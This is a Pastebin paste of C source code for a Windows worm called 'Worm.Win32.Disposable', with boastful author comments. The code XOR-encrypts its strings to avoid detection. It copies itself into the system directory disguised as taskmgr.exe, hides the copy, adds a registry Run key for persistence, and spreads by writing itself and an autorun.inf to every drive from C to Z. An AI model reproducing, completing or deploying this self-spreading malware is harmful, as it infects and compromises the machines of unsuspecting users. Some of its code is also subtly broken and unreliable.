Advertisement
FlyFar

Worm.Win32.Disposable - Hav0c - Rohitab

Jul 7th, 2023
912
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.49 KB | Cybersecurity | 0 0
  1. /* disposable.c - coded by Hav0c
  2.  
  3. This l33t <span class="searchlite">worm</span> is the first one I've made
  4.  
  5. that uses encrypted strings to avoid being
  6.  
  7. too suspicious when opened with hex editors
  8.  
  9. or even windbl0wz notepad. Spreads by copying itself to drives
  10.  
  11. (from C to Z, without checking if they are removable or not).
  12.  
  13. Compiles with Dev-C++ (I run it with WINE).
  14.  
  15.  
  16.  
  17. PS: I hate skiddies
  18.  
  19. PPS: Blasted Mechanism FTW!!1
  20.  
  21. */
  22.  
  23.  
  24.  
  25. #include <stdio.h>
  26.  
  27. #include <stdlib.h>
  28.  
  29. #include <string.h>
  30.  
  31. #include <windows.h>
  32.  
  33.  
  34.  
  35.  
  36. char teh<span class="searchlite">worm</span>[]="XXpewoicv*a|a"; // \\taskmgr.exe
  37.  
  38. char regkey[]="WkbpsevaXXImgvkwkbpXXSmj`kswXXGqvvajpRavwmkjXXVqjXX"; // Software\\Microsoft\\Windows\\CurrentVersion\\Run\\
  39.  
  40.  
  41.  
  42. int decrypt(char string[], int key)
  43.  
  44. {
  45.  
  46.     int strsz=strlen(string);
  47.  
  48.     int i;
  49.  
  50.     for(i=0;i<strsz;i++){
  51.  
  52.         string[i] ^= key;
  53.  
  54.     }
  55.  
  56.     return string;
  57.  
  58. }
  59.  
  60.  
  61.  
  62. int CheckForMutex(char tehMutex[])
  63.  
  64. {
  65.  
  66.     HANDLE hMutex;
  67.  
  68.     hMutex=CreateMutex(NULL,1,tehMutex);
  69.  
  70.     if(GetLastError()==ERROR_ALREADY_EXISTS){
  71.  
  72.         ExitProcess(0);
  73.  
  74.     }
  75.  
  76. }
  77.  
  78.  
  79.  
  80. void RootKit(char file[]) // Not a real rootkit obviously, just hides some stuff
  81.  
  82. {
  83.  
  84.     SetFileAttributes(file,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
  85.  
  86. }
  87.  
  88.  
  89.  
  90. void MakeRegKey(char destiny[])
  91.  
  92. {
  93.  
  94.     HKEY hKey;
  95.  
  96.     char buffer[MAX_PATH];
  97.  
  98.     strcpy(buffer,decrypt("pewoicv",4)); // taskmgr
  99.  
  100.     if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,decrypt(regkey,4),0,KEY_SET_VALUE,&hKey)||
  101.         RegOpenKeyEx(HKEY_CURRENT_USER,decrypt(regkey,4),0,KEY_SET_VALUE,&hKey)==ERROR_SUCCESS){
  102.  
  103.         RegSetValueEx(hKey,buffer,0,REG_SZ,(const unsigned char *)destiny,sizeof(destiny));
  104.  
  105.         RegCloseKey(hKey);
  106.  
  107.     }
  108.  
  109.     else{
  110.  
  111.         ExitProcess(0);
  112.  
  113.     }
  114.  
  115. }
  116.  
  117.  
  118.  
  119. void DriveSpread(char shizzle[])
  120.  
  121. {
  122.  
  123.     FILE *fp;
  124.  
  125.     int n;
  126.  
  127.     char buffer1[MAX_PATH],buffer2[MAX_PATH],buffer3[MAX_PATH];
  128.  
  129.     strcpy(buffer1,decrypt("G>XXeqpkvqj*mjb",4)); // C:\\autorun.inf
  130.  
  131.     strcpy(buffer2,decrypt("G>XXLer4g*a|a",4)); // C:\\Hav0c.exe
  132.  
  133.     strcpy(buffer3,decrypt("_eqpkvqjYXvXjktaj9Ler4g*a|aXvXjWlahhA|agqpa9Ler4g*a|aXvXj",4)); // [autorun]\r\nopen=Hav0c.exe\r\nShellExecute=Hav0c.exe\r\n
  134.  
  135.     for(n='C';n<='Z';n++){
  136.  
  137.         buffer1[0]=n;
  138.  
  139.         buffer2[0]=n;
  140.  
  141.         if(CopyFile(shizzle,buffer2,0)!=NULL){
  142.  
  143.             RootKit(buffer2);
  144.  
  145.         }
  146.  
  147.         if((fp=fopen(buffer1,writting))!=NULL){
  148.  
  149.             fprintf(fp,buffer3);
  150.  
  151.             fclose(fp);
  152.  
  153.             RootKit(buffer1);
  154.  
  155.         }
  156.  
  157.     }
  158.  
  159. }
  160.  
  161.  
  162.  
  163. int main()
  164.  
  165. {
  166.  
  167.     char sysdir[MAX_PATH];
  168.  
  169.     char <span class="searchlite">worm</span>[MAX_PATH];
  170.  
  171.     CheckForMutex(decrypt("Ler4g[Ksj~[@mk",4)); // find it out your self
  172.  
  173.     HMODULE GetModH=GetModuleHandle(NULL);
  174.  
  175.     GetModuleFileName(GetModH,<span class="searchlite">worm</span>,sizeof(<span class="searchlite">worm</span>));
  176.  
  177.     GetSystemDirectory(sysdir,sizeof(sysdir));
  178.  
  179.     strcat(sysdir,decrypt(teh<span class="searchlite">worm</span>,4));
  180.  
  181.     CopyFile(<span class="searchlite">worm</span>,sysdir,0);
  182.  
  183.     RootKit(sysdir);
  184.  
  185.     MakeRegKey(sysdir);
  186.  
  187.     while(1){
  188.  
  189.         DriveSpread(<span class="searchlite">worm</span>);
  190.  
  191.         //Payload here(function not included to avoid �b3r unl33t skiddiz <_<)
  192.  
  193.         Sleep(20000);
  194.  
  195.     }
  196.  
  197.     return 0;
  198.  
  199. }
Tags: worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement